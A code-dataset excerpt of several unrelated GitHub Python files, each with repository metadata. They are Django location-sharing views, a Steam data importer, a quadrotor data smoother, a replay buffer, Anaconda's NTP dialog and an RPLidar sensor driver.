email.\n data_str = request.body.decode('utf-8')\n if data_str == \"\":\n return JsonResponse({\"success\": False, \"error\": \"Invalid data\"})\n data = json.loads(data_str)\n if 'email' not in data:\n return JsonResponse({\"success\": False, \"error\": \"No email received\"})\n \n # Check user by email.\n if not CustomUser.objects.filter(email=data['email'].lower()).exists():\n return JsonResponse({\"success\": False, \"error\": \"No user with given email exists\"})\n\n # Add email to user friend list.\n user = CustomUser.objects.get(email=data['email'].lower())\n if 'associates' not in user.friend_list:\n user.friend_list['associates'] = []\n current_user_email = tokens[request.headers['Authorization']].email\n if current_user_email in user.friend_list['associates']:\n return JsonResponse({\"success\": False, \"error\": \"User already registered as associate\"})\n user.friend_list['associates'].append(current_user_email)\n user.save()\n return JsonResponse({\"success\": True})\n\n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\n@csrf_exempt\ndef remove_friend(request):\n # Check method.\n if request.method == \"POST\":\n # Check token.\n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n \n # Check email.\n data_str = request.body.decode('utf-8')\n if data_str == \"\":\n return JsonResponse({\"success\": False, \"error\": \"Invalid data\"})\n data = json.loads(data_str)\n if 'email' not in data:\n return JsonResponse({\"success\": False, \"error\": \"No email received\"})\n \n user = tokens[request.headers['Authorization']]\n\n \n # Check user by email.\n if 'friends' not in user.friend_list or data['email'].lower() not in user.friend_list['friends']:\n return JsonResponse({\"success\": False, \"error\": \"Email not in frined list\"})\n\n # Remove email from user friend list.\n user.friend_list['friends'].remove(data['email'].lower())\n user.save()\n return JsonResponse({\"success\": True})\n\n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\nlocation_data = {}\n\n@csrf_exempt\ndef send_location(request):\n # Check method.\n if request.method == \"POST\":\n # Check token.\n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n \n # Check data.\n data_str = request.body.decode('utf-8')\n if data_str == \"\":\n return JsonResponse({\"success\": False, \"error\": \"Invalid data\"})\n data = json.loads(data_str)\n if 'latitude' not in data or 'longitude' not in data or 'timestamp' not in data:\n return JsonResponse({\"success\": False, \"error\": \"Incomplete data\"})\n \n user = tokens[request.headers['Authorization']]\n\n # Store location.\n location_data[user.email] = {\"latitude\": data['latitude'], \"longitude\": data['longitude'], \"timestamp\": data['timestamp']}\n \n return JsonResponse({\"success\": True})\n\n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\n@csrf_exempt\ndef get_location(request):\n # Check method.\n if request.method == \"POST\":\n # Check token.\n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n \n # Check email.\n data_str = request.body.decode('utf-8')\n if data_str == \"\":\n return JsonResponse({\"success\": False, \"error\": \"Invalid data\"})\n data = json.loads(data_str)\n if 'email' not in data:\n return JsonResponse({\"success\": False, \"error\": \"No email received\"})\n email = data['email'].lower()\n \n # Check if email is in location data.\n if email not in location_data:\n return JsonResponse({\"success\": False, \"error\": \"No available data\"})\n\n return JsonResponse({\"success\": True, email: location_data[email]})\n\n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\n@csrf_exempt\ndef get_associates(request):\n # Check method.\n if request.method == \"GET\":\n # Check token.\n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n \n requesting_user = tokens[request.headers[\"Authorization\"]]\n if 'associates' not in requesting_user.friend_list:\n requesting_user.friend_list['associates'] = []\n return JsonResponse({\"success\": True, \"associates\": requesting_user.friend_list['associates']})\n \n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})","repo_name":"alinichim/CityPulse","sub_path":"server/shelters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19878850593","text":"\"\"\"Created by Austin Rhee 8/3/2023\"\"\"\nimport time\n\nfrom src import steamimport as stim\nfrom src import CSVHandler as csvh\n\ndef GetAppLists():\n \"\"\"Provided a list of appIDs, query Steam API for detailed information,\n Sanitize the gathered data, then write this data to a .csv file.\n User defined number of games to process\"\"\"\n appIDs = csvh.grabAppIDs('steamofficial.csv')\n index = csvh.grabIndex('indexer.csv')\n stIndex = index\n end = len(appIDs)\n\n while True:\n try:\n # groupSize = int(input('Number of games to process: '))\n # Used if user Defined sizes are required\n groupSize = 500\n except ValueError:\n print('Please input an integer.')\n else:\n break\n \n print('Beginning at index', index)\n st = time.time()\n while (index < end - 1) and (index - stIndex < groupSize):\n appInfo = stim.getAppInfo(appIDs[index])\n if appInfo == False:\n print('JSON failure at', index)\n print('Stopping requests...')\n break\n stim.saveData(appInfo, 'data/', 'compAppInfo.csv', stim.fieldsBaseSteam())\n index += 1\n csvh.updateIndex(index, 'indexer.csv')\n if index % 10 == 0 and index != 0:\n en = time.time()\n print('Jobs', index - 10, 'to', index, 'completed.')\n print('Took', round(en - st, 2), 'seconds')\n st = time.time()\n print(index - stIndex, 'completed. Stopping...')\n csvh.updateIndex(index, 'indexer.csv')\n\nif __name__ == '__main__':\n GetAppLists()","repo_name":"Wastfulajr/COP3530-Project-3","sub_path":"importdata.py","file_name":"importdata.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"827837508","text":"import os,fnmatch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nsave_path = \"/home/pratyush/Desktop/quadrotor_lqr/catkin_ws/src/offb_pkg/src/smooth_data/\"\n\nstates \t= os.listdir('../next_state/data/states/')\ncontrol = os.listdir('../next_state/data/controls/')\nacc \t= os.listdir('../next_state/data/acc/')\nnn2 \t= os.listdir('../next_state/data/nn2/')\n\n\npattern = \"*.npy\"\n\nfilesName = []\n\nfor entry in states:\n\tif fnmatch.fnmatch(entry,pattern):\n\t\tprint(entry)\n\t\tfilesName.append(entry)\n\n\ncount = 0\nfor file in filesName:\n\tdata_dir = \"../next_state/data/states/\"\n\n\tstate \t= np.load(data_dir + file )\n\n\tsize = state.shape[0]\n\tprint('file name' + file)\n\tcount += 1\n\n\tx = []\n\ty = []\n\tz = []\n\n\tvx = []\n\tvy = []\n\tvz = []\n\n\tphi = []\n\ttheta = []\n\tpsi = []\n\n\n\tsin_phi = []\n\tsin_theta = []\n\tsin_psi = []\n\n\n\tcos_phi = []\n\tcos_theta = []\n\tcos_psi = []\n\n\n\trs = []\n\tps = []\n\tys = []\n\n\n\tu1 = []\n\tu2 = []\n\tu3 = []\n\tu4 = []\n\n\tac_x = []\n\tac_y = []\n\tac_z = []\n\n\n\talpha_x = []\n\talpha_y = []\n\talpha_z = []\n\n\n\ts_vx = []\n\ts_vy = []\n\ts_vz = []\n\n\ts_rs = []\n\ts_ps = []\n\ts_ys = []\n\n\ts_ac_x = []\n\ts_ac_y = []\n\ts_ac_z = []\n\n\n\ts_alpha_x = []\n\ts_alpha_y = []\n\ts_alpha_z = []\n\n\n\ta = 0.05\n\n\tfor row in range(0,size):\n\t\tx.append(state[row,0])\n\t\ty.append(state[row,1])\n\t\tz.append(state[row,2])\n\n\t\tvx.append(state[row,3] )\n\t\tvy.append(state[row,4])\n\t\tvz.append(state[row,5])\n\n\t\tsin_phi.append(state[row,6])\n\t\tsin_theta.append(state[row,7])\n\t\tsin_psi.append(state[row,8])\n\n\n\t\tcos_phi.append(state[row,9])\n\t\tcos_theta.append(state[row,10])\n\t\tcos_psi.append(state[row,11])\n\n\n\t\trs.append(state[row,12] )\n\t\tps.append(state[row,13] )\n\t\tys.append(state[row,14] )\n\n\t\tphi.append(state[row,15] )\n\t\ttheta.append(state[row,16])\n\t\tpsi.append(state[row,17])\n\n\t\tu1.append(control[row,0]*1)\n\t\tu2.append(control[row,1]*1)\n\t\tu3.append(control[row,2]*1)\n\t\tu4.append(control[row,3]*1)\n\n\n\t\tac_x.append(acc[row,0])\n\t\tac_y.append(acc[row,1])\n\t\tac_z.append(acc[row,2])\n\n\t\talpha_x.append(alpha[row,0])\n\t\talpha_y.append(alpha[row,1])\n\t\talpha_z.append(alpha[row,2])\n\n\n\t## Linear velocity\n\ttemp_x = state[0,3]\n\ttemp_y = state[0,4]\n\ttemp_z = state[0,5]\n\tfor row in xrange(0,size):\n\n\t\ttemp_x = temp_x + a*(state[row,3] - temp_x)\n\t\ttemp_y = temp_y + a*(state[row,4] - temp_y)\n\t\ttemp_z = temp_z + a*(state[row,5] - temp_z)\n\n\t\ts_vx.append( temp_x )\n\t\ts_vy.append( temp_y )\n\t\ts_vz.append( temp_z )\n\n\n\n\t## Linear Acceleration\n\ttemp_x = acc[0,0]\n\ttemp_y = acc[0,1]\n\ttemp_z = acc[0,2]\n\tfor row in xrange(0,size):\n\n\t\ttemp_x = temp_x + a*(acc[row,0] - temp_x)\n\t\ttemp_y = temp_y + a*(acc[row,1] - temp_y)\n\t\ttemp_z = temp_z + a*(acc[row,2] - temp_z)\n\n\t\ts_ac_x.append( temp_x )\n\t\ts_ac_y.append( temp_y )\n\t\ts_ac_z.append( temp_z )\n\n\n\n\t## Angular Velocity\n\ttemp_x = state[0,12]\n\ttemp_y = state[0,13]\n\ttemp_z = state[0,14]\n\tfor row in xrange(0,size):\n\n\t\ttemp_x = temp_x + a*(state[row,12] - temp_x)\n\t\ttemp_y = temp_y + a*(state[row,13] - temp_y)\n\t\ttemp_z = temp_z + a*(state[row,14] - temp_z)\n\n\t\ts_rs.append( temp_x )\n\t\ts_ps.append( temp_y )\n\t\ts_ys.append( temp_z )\n\n\n\n\t\t## Angular Acceleration\n\t\ttemp_x = s_rs[0]\n\t\ttemp_y = s_ps[0]\n\t\ttemp_z = s_ys[0]\n\t\tdelta_t = 0.02\n\n\tfor row in xrange(1,size):\n\n\t\t# temp_x = temp_x + a*(acc[row,0] - temp_x)\n\t\t# temp_y = temp_y + a*(acc[row,1] - temp_y)\n\t\t# temp_z = temp_z + a*(acc[row,2] - temp_z)\n\n\t\ts_alpha_x.append((s_rs[row] - temp_x )/delta_t)\n\t\ts_alpha_y.append((s_ps[row] - temp_y )/delta_t)\n\t\ts_alpha_z.append((s_ys[row] - temp_z )/delta_t)\n\n\t\ttemp_x = s_rs[row]\n\t\ttemp_y = s_ps[row]\n\t\ttemp_z = s_ys[row]\n\n\n\t\t# temp_x = alpha_x[0]\n\t\t# temp_y = alpha_y[0]\n\t\t# temp_z = alpha_z[0]\n\t\t# for row in xrange(0,size):\n\n\t\t# \ttemp_x = temp_x + a*(alpha_x[row] - temp_x)\n\t\t# \ttemp_y = temp_y + a*(alpha_y[row] - temp_y)\n\t\t# \ttemp_z = temp_z + a*(alpha_z[row] - temp_z)\n\n\t\t# \ts_alpha_x.append( temp_x )\n\t\t# \ts_alpha_y.append( temp_y )\n\t\t# \ts_alpha_z.append( temp_z )\n\n\t\ts_state = np.array([x,y,z, s_vx, s_vy, s_vz, phi, theta, psi, s_rs, s_ps, s_ys],ndmin=2).transpose()\n\t\tnp.save(save_path + file, s_state)","repo_name":"pratyusv/px4_data_collection","sub_path":"catkin_ws/src/offb_pkg/src/plots/smooth_data.py","file_name":"smooth_data.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"39131836868","text":"import numpy as np\n\n\nclass ReplayBuffer():\n def __init__(self, max_size, input_dims):\n self.mem_size = max_size\n self.mem_cntr = 0\n\n self.state_memory = np.zeros((self.mem_size, input_dims), dtype=np.int)\n self.new_state_memory = np.zeros((self.mem_size, input_dims), dtype=np.int)\n self.action_memory = np.zeros(self.mem_size, dtype=np.int)\n self.reward_memory = np.zeros(self.mem_size, dtype=np.int)\n self.terminal_memory = np.zeros(self.mem_size, dtype=np.int)\n\n def store_transition(self, state, action, reward, next_state, terminal):\n index = self.mem_cntr % self.mem_size\n self.state_memory[index] = state\n self.new_state_memory[index] = next_state\n self.action_memory[index] = action\n self.reward_memory[index] = reward\n self.terminal_memory[index] = int(1-terminal)\n self.mem_cntr += 1\n\n def sample_buffer(self, batch_size):\n max_mem = min(self.mem_cntr, self.mem_size)\n batch = np.random.choice(max_mem, batch_size, replace=False)\n\n states = self.state_memory[batch]\n next_states = self.new_state_memory[batch]\n actions = self.action_memory[batch]\n rewards = self.reward_memory[batch]\n terminals = self.terminal_memory[batch]\n\n return states, next_states, actions, rewards, terminals\n","repo_name":"cichyr/CarAI","sub_path":"ReplayBuffer.py","file_name":"ReplayBuffer.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74984552100","text":"from pyanaconda import network\nfrom pyanaconda import ntp\nfrom pyanaconda.anaconda_loggers import get_module_logger\nfrom pyanaconda.core import constants\nfrom pyanaconda.core.configuration.anaconda import conf\nfrom pyanaconda.core.constants import TIME_SOURCE_POOL, TIME_SOURCE_SERVER\nfrom pyanaconda.core.service import restart_service\nfrom pyanaconda.core.timer import Timer\nfrom pyanaconda.modules.common.structures.timezone import TimeSourceData\nfrom pyanaconda.ui.gui import GUIObject\nfrom pyanaconda.ui.gui.utils import override_cell_property\nfrom pyanaconda.timezone import NTP_SERVICE\n\nlog = get_module_logger(__name__)\n\n# constants for server store indices\nSERVER_HOSTNAME = 0\nSERVER_POOL = 1\nSERVER_NTS = 2\nSERVER_WORKING = 3\nSERVER_OBJECT = 4\n\nSERVER_STARTING_STRING = \"\"\n\n\nclass NTPConfigDialog(GUIObject):\n builderObjects = [\"ntpConfigDialog\", \"serversStore\"]\n mainWidgetName = \"ntpConfigDialog\"\n uiFile = \"spokes/lib/ntp_dialog.glade\"\n\n def __init__(self, data, servers, states):\n GUIObject.__init__(self, data)\n self._servers = servers\n self._active_server = None\n self._states = states\n\n # self.window.set_size_request(500, 400)\n\n working_column = self.builder.get_object(\"workingColumn\")\n working_renderer = self.builder.get_object(\"workingRenderer\")\n override_cell_property(working_column, working_renderer, \"icon-name\", self._render_working)\n\n self._serversView = self.builder.get_object(\"serversView\")\n self._serversStore = self.builder.get_object(\"serversStore\")\n\n self._update_timer = Timer()\n\n def _render_working(self, column, renderer, model, itr, user_data=None):\n value = self._serversStore[itr][SERVER_WORKING]\n\n if value == constants.NTP_SERVER_QUERY:\n return \"dialog-question-symbolic\"\n elif value == constants.NTP_SERVER_OK:\n return \"emblem-default-symbolic\"\n else:\n return \"dialog-error-symbolic\"\n\n def refresh(self):\n # Update the store.\n self._serversStore.clear()\n\n for server in self._servers:\n self._add_row(server)\n\n # Start to update the status.\n self._update_timer.timeout_sec(1, self._update_rows)\n\n def run(self):\n self.window.show()\n rc = self.window.run()\n self.window.hide()\n\n # OK clicked\n if rc == 1:\n # Clean up unedited entries\n self._cleanup_unedited_entry()\n # Restart the NTP service.\n if conf.system.can_set_time_synchronization:\n ntp.save_servers_to_config(self._servers)\n restart_service(NTP_SERVICE)\n\n return rc\n\n def _get_last_entry_itr(self):\n \"\"\"Get itr of the last entry.\"\"\"\n index = len(self._serversStore) - 1\n\n if index < 0:\n return None\n\n return self._serversStore.get_iter_from_string(str(index))\n\n def _is_last_entry_unedited(self):\n \"\"\"Is the last entry unedited?\"\"\"\n itr = self._get_last_entry_itr()\n\n if not itr:\n return False\n\n server = self._serversStore[itr][SERVER_OBJECT]\n return server.hostname == SERVER_STARTING_STRING\n\n def _cleanup_unedited_entry(self):\n \"\"\"Clean up unedited entry.\n\n There can be only one, at the very end.\n \"\"\"\n if not self._is_last_entry_unedited():\n return\n\n itr = self._get_last_entry_itr()\n self._serversStore.remove(itr)\n del self._servers[-1]\n\n def _add_row(self, server):\n \"\"\"Add a new row for the given NTP server.\n\n :param server: an NTP server\n :type server: an instance of TimeSourceData\n \"\"\"\n itr = self._serversStore.append([\n \"\",\n False,\n False,\n constants.NTP_SERVER_QUERY,\n server\n ])\n\n self._refresh_row(itr)\n\n def _refresh_row(self, itr):\n \"\"\"Refresh the given row.\"\"\"\n server = self._serversStore[itr][SERVER_OBJECT]\n self._serversStore.set_value(itr, SERVER_HOSTNAME, server.hostname)\n self._serversStore.set_value(itr, SERVER_POOL, server.type == TIME_SOURCE_POOL)\n self._serversStore.set_value(itr, SERVER_NTS, \"nts\" in server.options)\n\n def _update_rows(self):\n \"\"\"Periodically update the status of all rows.\n\n :return: True to repeat, otherwise False\n \"\"\"\n for row in self._serversStore:\n server = row[SERVER_OBJECT]\n\n if server is self._active_server:\n continue\n\n status = self._states.get_status(server)\n row[SERVER_WORKING] = status\n\n return True\n\n def on_add_button_clicked(self, *args):\n \"\"\"Handler for Add button.\n\n Tries to add a new server for editing, or reuse an existing server that was not edited\n after adding.\n \"\"\"\n # check if there is any unedited server\n # exactly zero or one such server can exist, at last position only\n if not self._is_last_entry_unedited():\n # no unedited leftover, so make a new server with a reasonable guess about the defaults\n server = TimeSourceData()\n server.type = TIME_SOURCE_SERVER\n server.hostname = SERVER_STARTING_STRING\n server.options = [\"iburst\"]\n # add the (still invalid) server\n self._servers.append(server)\n self._states.check_status(server)\n self._add_row(server)\n\n # select the correct row - it is always the last one\n itr = self._get_last_entry_itr()\n selection = self._serversView.get_selection()\n selection.select_iter(itr)\n self._serversView.grab_focus()\n\n # start editing the newly added server hostname\n # it is already selected so just \"press\" the edit button\n self.on_edit_button_clicked(*args)\n\n def on_edit_button_clicked(self, *args):\n \"\"\"Handler for Edit button\"\"\"\n selection = self._serversView.get_selection()\n store, items = selection.get_selected_rows() # pylint: disable=unused-variable\n path = items[-1] # take only the last item\n column = self._serversView.get_column(0) # first column is server/hostname\n self._serversView.set_cursor(path, column, True)\n\n def on_remove_button_clicked(self, *args):\n \"\"\"Handler for Remove button\"\"\"\n selection = self._serversView.get_selection()\n store, items = selection.get_selected_rows()\n for path in reversed(items):\n itr = store.get_iter(path)\n server = store[itr][SERVER_OBJECT]\n store.remove(itr)\n self._servers.remove(server)\n\n def on_pool_toggled(self, renderer, path, *args):\n itr = self._serversStore.get_iter(path)\n server = self._serversStore[itr][SERVER_OBJECT]\n\n if server.type == TIME_SOURCE_SERVER:\n server.type = TIME_SOURCE_POOL\n else:\n server.type = TIME_SOURCE_SERVER\n\n self._refresh_row(itr)\n\n def on_nts_toggled(self, renderer, path, *args):\n itr = self._serversStore.get_iter(path)\n server = self._serversStore[itr][SERVER_OBJECT]\n\n if \"nts\" in server.options:\n server.options.remove(\"nts\")\n else:\n server.options.append(\"nts\")\n\n self._states.check_status(server)\n self._refresh_row(itr)\n\n def on_server_editing_started(self, renderer, editable, path):\n itr = self._serversStore.get_iter(path)\n self._active_server = self._serversStore[itr][SERVER_OBJECT]\n\n def on_server_editing_canceled(self, renderer):\n self._active_server = None\n\n def on_server_edited(self, renderer, path, new_text, *args):\n self._active_server = None\n\n if not path:\n return\n\n (valid, error) = network.is_valid_hostname(new_text)\n if not valid:\n log.error(\"'%s' is not a valid hostname: %s\", new_text, error)\n return\n\n itr = self._serversStore.get_iter(path)\n server = self._serversStore[itr][SERVER_OBJECT]\n\n if server.hostname == new_text:\n return\n\n server.hostname = new_text\n self._states.check_status(server)\n self._refresh_row(itr)\n","repo_name":"rhinstaller/anaconda","sub_path":"pyanaconda/ui/gui/spokes/lib/ntp_dialog.py","file_name":"ntp_dialog.py","file_ext":"py","file_size_in_byte":8312,"program_lang":"python","lang":"en","doc_type":"code","stars":494,"dataset":"github-code","pt":"35"} +{"seq_id":"13422371689","text":"\"\"\"\r\n@author: Dhruv Parikh\r\n@organisation: General Aeronautics Pvt. Ltd.\r\n@date: 1-03-2022\r\n\"\"\"\r\n\r\n\"\"\"\r\n@Description:\r\n Sensor driver for lidar/radar\r\n @Todo: Add UART driver support\r\n Add CAN driver support\r\n\"\"\"\r\n\r\n\r\nimport math\r\nimport socket\r\nimport math\r\nimport logging\r\nimport threading\r\nimport serial\r\nimport time\r\nimport struct\r\n\r\nclass SensorDriver():\r\n def __init__(self,drivertype):\r\n \"\"\"Initialiser for Sensor Driver\r\n\r\n Args:\r\n drivertype (String): Put in SITL or RPLidar\r\n \"\"\"\r\n self.HOST = None\r\n self.raw_data = [40]*360\r\n self.drivername = drivertype\r\n \r\n #Connect to local host and port. This connects to the C++ bridge\r\n if drivertype == 'SITL':\r\n self.HOST, self.PORT = \"localhost\", 8080\r\n self.raw_data = [0]*10\r\n self.lid = []\r\n\r\n #Connect to actual RPLidar. Warning: Pretty unstable code \r\n else:\r\n self.PORT = '/dev/ttyUSB0'\r\n self.START_FLAG = b\"\\xA5\"\r\n self.HEALTH_CMD = b\"\\x52\"\r\n self.GET_INFO = b\"\\x50\"\r\n self.RESET = b\"\\x40\"\r\n \r\n self.STOP = b\"\\x25\"\r\n self.START_SCAN = b\"\\x20\"\r\n self.HEALTH = 1\r\n self.INFO = 2\r\n self.SCAN = 3\r\n self.RESPONSE_FLAG = b\"\\x5A\"\r\n \r\n self.master_angle = []\r\n self.master_distance = []\r\n \r\n self.scan_data = None\r\n \r\n\r\n \r\n\r\n def connect_and_fetch(self):\r\n \"\"\"Connects to the sensor and starts the scan request\r\n \"\"\"\r\n #SITl\r\n if self.HOST != None:\r\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.s.connect((self.HOST, self.PORT))\r\n logging.info(\"Bridge initialised\")\r\n \r\n #RPLidar\r\n else:\r\n #Connect to the sensor\r\n self.lidar_connection = serial.Serial(self.PORT,baudrate=115200,parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE,timeout=1)\r\n #Sleep for 2 Seconds\r\n time.sleep(2)\r\n #Send Stop Scan request\r\n self.send_stopscan_request()\r\n print(\"Stopped\")\r\n #Wait for few ms\r\n time.sleep(0.002)\r\n #Reset the lidar\r\n self.send_reset_request()\r\n #Stop the motor\r\n self.set_pwm(0)\r\n\r\n time.sleep(2)\r\n #Clear the buffer\r\n self.clear_input_buffer() \r\n \r\n #Start the motor\r\n self.set_pwm(866)\r\n\r\n\r\n\r\n time.sleep(1)\r\n #Send the request to start scanning - by this time, the motor would be at constant rate and hence should output data immediately\r\n self.start_scan_request()\r\n #Read the header of the response packet\r\n self.read_response()\r\n \r\n def read_fast(self):\r\n \"\"\"\r\n Read all stack of 4000 bytes from the buffer. \r\n This function has to be called only once - create a seperate thread\r\n \"\"\"\r\n while True:\r\n if self.lidar_connection.inWaiting()>300:\r\n self.scan_data = self.pass_raw_data(4000)\r\n\r\n def clear_input_buffer(self):\r\n \"\"\"Clears the input buffer multiple times\r\n We will make sure that my fragile and non robust driver won't have any problems with the header\r\n\r\n @Warning:\r\n Don't Call haphazardly. \r\n \"\"\"\r\n for i in range(1000):\r\n self.lidar_connection.reset_input_buffer()\r\n\r\n def give_scan_values(self):\r\n \"\"\"\r\n Parse the readings, append the angle and distance from it. \r\n Note that every new scan, the old scan values are discarded. \r\n This is okay for memory based sense and stop as it stores the values anyway.\r\n \"\"\"\r\n while True:\r\n time.sleep(0.0001)\r\n #If there is data populated\r\n if self.scan_data is not None:\r\n #Protect the instant data -> Tip: We need such protectors in every function \r\n data = self.scan_data\r\n\r\n #For each 5 byte packet, parse the readings according to datasheet\r\n for i in range(0,len(data),5):\r\n\r\n new_scan, angle, distance = self.parse_scan_readings(data[i:i+5])\r\n #If we get new scan, remove all the previous data and start appending\r\n if new_scan:\r\n self.master_angle = []\r\n self.master_distance = []\r\n self.master_angle.append(angle)\r\n self.master_distance.append(distance) \r\n #This flag is output of the parse_scan_readings when things go wrong. \r\n elif new_scan == -1:\r\n print(\"problem\")\r\n \r\n #Keep appending till we get new scan header\r\n else:\r\n self.master_angle.append(float(angle))\r\n self.master_distance.append(float(distance))\r\n \r\n def update_rplidar(self):\r\n \"\"\"\r\n @Description: \r\n Populates the lidar data in the raw_data var\r\n If lidar data outputs more than 10 measurements per scan, then we will consider the output\r\n The data is downsampled to resolution of 1 degree to be fed to the SAADataHandler\r\n \"\"\"\r\n\r\n lid = []\r\n ang = []\r\n mag = [40]*360\r\n #print(mag)\r\n\r\n \r\n #Saving the values so they dont get updated\r\n #This is an example of the many length based checks I have done to ensure that data is there before me start dividing stuff by zero\r\n\r\n master_angles_copy = self.master_angle\r\n master_distance_copy = self.master_distance\r\n if len(master_angles_copy)>2 and (len(master_distance_copy)==len(master_angles_copy)):\r\n angles = master_angles_copy\r\n distance = master_angles_copy\r\n else:\r\n #Wait for some time to populate a few more readings\r\n time.sleep(0.001)\r\n if((len(self.master_distance)==len(self.master_angle))):\r\n angles = self.master_angle\r\n distance = self.master_distance\r\n else:\r\n master_angles_copy = self.master_angle\r\n master_distance_copy = self.master_distance\r\n\r\n min_len = min(len(master_distance_copy),len(master_angles_copy))\r\n print(min_len)\r\n angles = master_angles_copy[0:min_len-1]\r\n distance = master_distance_copy[0:min_len-1]\r\n \r\n \r\n #Reset the vars\r\n mag = [40]*360\r\n\r\n #Number of measurement in this scan\r\n no_of_scans = len(angles)\r\n #If scan is valid\r\n if no_of_scans>2:\r\n #Append the data to lidar and magnitude\r\n for j in range(no_of_scans-1):\r\n #Sometimes the index error occurs\r\n # lid.append(float(scan[j][2]))\r\n #Downsampling the angular reading\r\n #if ang = 1.2, it will be converted to 1\r\n # ang.append(int(math.floor(scan[j][1])))\r\n ang = (math.floor(angles[j]))\r\n if ang>359 or ang<0:\r\n ang = 0\r\n try:\r\n mag[ang] = float(distance[j])/1000\r\n except:\r\n print(len(angles),j,no_of_scans)\r\n\r\n #Assign to the global var once the data is populated\r\n self.raw_data = mag\r\n\r\n else:\r\n #If no of scans are less, then assign the default unusable reading\r\n self.raw_data = mag\r\n \r\n def return_readings(self):\r\n \"\"\"Raw data accessor\r\n\r\n Returns:\r\n 1D array of length 360\r\n \"\"\"\r\n return self.raw_data\r\n\r\n\r\n def update_sitl_sensor(self):\r\n \"\"\"This is for Gazebo SITL. It just decodes the sockets \r\n \"\"\"\r\n\r\n #Empty the array for new fetch\r\n lid = []\r\n\r\n #empty the data\r\n data = None\r\n\r\n #Keep fetching until the data is filled with 64 indices\r\n while len(lid)<=64:\r\n data = self.s.recv(4).decode(\"utf-8\") \r\n #If we recieve a new packet of data\r\n if data == 'new ':\r\n if len(lid) == 64:\r\n self.raw_data = lid\r\n lid = [] \r\n elif data != None:\r\n lid.append(float(data))\r\n \r\n def send_health_request(self):\r\n \"\"\"Sends the health request. It doesn't handle the recieve commands\r\n \"\"\"\r\n if self.lidar_connection.is_open:\r\n buf = self.START_FLAG + self.HEALTH_CMD\r\n self.lidar_connection.write(buf)\r\n self.request = self.HEALTH\r\n\r\n def send_getinfo_request(self):\r\n self.send_cmd(self.GET_INFO)\r\n self.request = self.INFO\r\n\r\n def send_reset_request(self):\r\n \"\"\"This function doesnt work that well. Need more tests. Kindly don't use\r\n \"\"\"\r\n self.lidar_connection.setDTR(True)\r\n self.send_cmd(self.RESET)\r\n \r\n \r\n def send_stopscan_request(self):\r\n \"\"\"Stops the scan.\r\n \"\"\"\r\n self.lidar_connection.setDTR(True)\r\n self.send_cmd(self.STOP)\r\n \r\n def start_scan_request(self):\r\n \"\"\"Starts the scan. \r\n \"\"\"\r\n self.lidar_connection.setDTR(True)\r\n self.send_cmd(self.START_SCAN)\r\n self.request = self.SCAN\r\n \r\n def send_cmd(self,cmd):\r\n \"\"\"Sends the command to the RPLidar. Since each command is send using the start flag, this common function\r\n helps.\r\n\r\n Args:\r\n cmd (Byte String): Declare the vars in the class variables\r\n \"\"\"\r\n if self.lidar_connection.is_open:\r\n buf = self.START_FLAG + cmd\r\n self.lidar_connection.write(buf)\r\n \r\n def read_response(self):\r\n \"\"\"This function reads predefined responses. \r\n @TODO: A better implementation is required.\r\n\r\n Returns:\r\n Your byte data\r\n \"\"\"\r\n if self.lidar_connection.is_open:\r\n #Based on request, the amount of bytes to read is defined and headers are checked. \r\n if self.request == self.HEALTH:\r\n data_len = 3\r\n data = self.lidar_connection.read(7)\r\n if self.request ==self.INFO:\r\n data_len = 20\r\n data = self.lidar_connection.read(7)\r\n if self.request == self.SCAN:\r\n data_len = 0\r\n data = self.lidar_connection.read(7)\r\n \r\n return self.check_data_header(data,data_len)\r\n \r\n def check_data_header(self,data,data_len):\r\n \"\"\"This function checks the data header. Without this, no data can be read.\r\n\r\n Args:\r\n data (Bytesarray): Bytes array of header\r\n data_len (int): Amount of data to read for that specific request\r\n\r\n Returns:\r\n bytesarray: Returns the byte array if all checks are passed\r\n \"\"\"\r\n if len(data) != 7:\r\n print(\"Descriptor length mismatch\")\r\n return None\r\n elif not data.startswith(self.START_FLAG + self.RESPONSE_FLAG):\r\n print(\"Incorrect descriptor starting bytes\")\r\n return None\r\n else:\r\n if data_len!=0:\r\n data = (self.lidar_connection.read(data_len))\r\n return data\r\n \r\n def interprete_data(self,data):\r\n \"\"\"Unused function from initial design\r\n\r\n \"\"\"\r\n if len(data) > 0:\r\n if self.request == self.HEALTH:\r\n self.device_health = data[0]\r\n # if self.request == self.motor\r\n print(data)\r\n\r\n def _send_payload_cmd(self, cmd: bytes, payload: bytes) -> None:\r\n \"\"\"Sends the payload data (for motor spin). I have taken it from slamtec library.\r\n\r\n Args:\r\n cmd (bytes): MOTOR START\r\n payload (bytes)\r\n \"\"\"\r\n size = struct.pack(\"B\", len(payload))\r\n req = self.START_FLAG + cmd + size + payload\r\n \r\n checksum = 0\r\n for v in struct.unpack(\"B\" * len(req), req):\r\n checksum ^= v\r\n req += struct.pack(\"B\", checksum)\r\n self.lidar_connection.write(req)\r\n #Indicator that the command is sent\r\n print('Command sent: %s' % self._showhex(req))\r\n 